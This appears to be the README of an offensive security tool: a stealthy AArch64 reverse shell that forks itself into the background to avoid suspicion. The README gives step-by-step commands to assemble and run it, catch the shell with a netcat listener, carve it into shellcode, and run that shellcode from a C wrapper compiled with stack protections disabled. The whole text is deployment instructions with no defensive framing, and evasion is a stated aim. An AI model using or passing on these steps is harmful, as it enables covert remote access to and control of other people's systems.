ARM Reverse Shell + clone

ARM AARCH64 Reverse Shell.

Capabilities

A small, stealthy, ARM64 reverse shell that utilizes clone, similar to fork, in order to spawn a child process and run in the background. Ultimately to look less suspicious.

Compiling

Linux/AARCH64 as a guest OS on a MAC or other ARM-based device

as arm-revshell.s -o arm-revshell+clone.o && ld -N arm-revshell+clone.o -o arm-revshell

Begin a Netcat Listener

nc -lnvp 1337

Execute

Then, run ./arm-revshell+clone to execute.

x86-64 host OS, but you want to run/compile for AARCH64

aarch-linux-gnu-as arm-revshell+clone.s -o arm-revshell+clone.o && aarch-linux-gnu-ld -N arm-revshell+clone.o -o arm-revshell+clone

Begin a Netcat Listener

nc -lnvp 1337

Execute

Then, run qemu-aarch64 ./arm-revshell+clone to execute.`

ARM-Shellcode

Utilizing the Shellcode "Wrapper"

This is to show you that we can achieve the same cyber result, just in a different executable format. It also goes to show how easily it is to "fit" shellcode into places.

First, we must use objcopy to save the binary object to a .bin file so we can convert it into an easily copiable format:
objcopy -O binary arm-revshell+clone arm-revshell+clone.bin

Then, we need to utilize hexdump to "carve" out the shellcode from the binary object:
hexdump -v -e '"\\""x" 1/1 "%02x" ""' arm-revshell+clone.bin > shellcode.txt

Lastly, we need to copy the contents of shellcode.txt into the shellcode[] buffer, within the shellcode-exec.c file.

Compile the "Wrapper"

gcc shellcode-exec.c -o shellcode-exec -z execstack -fno-stack-protector

Reverse Shell Time!!!

We can now easily call our shellcode within a C program.

Start a Netcat Listener:
nc -lnvp 1337

Execute the program:
./shellcode-exec

CONGRATS, SHELLCODE EXECUTED! ENJOY!

MIT License Copyright (c) 2026 0xXyc / SWIZ_SECURITY Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. USE AT YOUR OWN RISK. NO WARRANTY PROVIDED.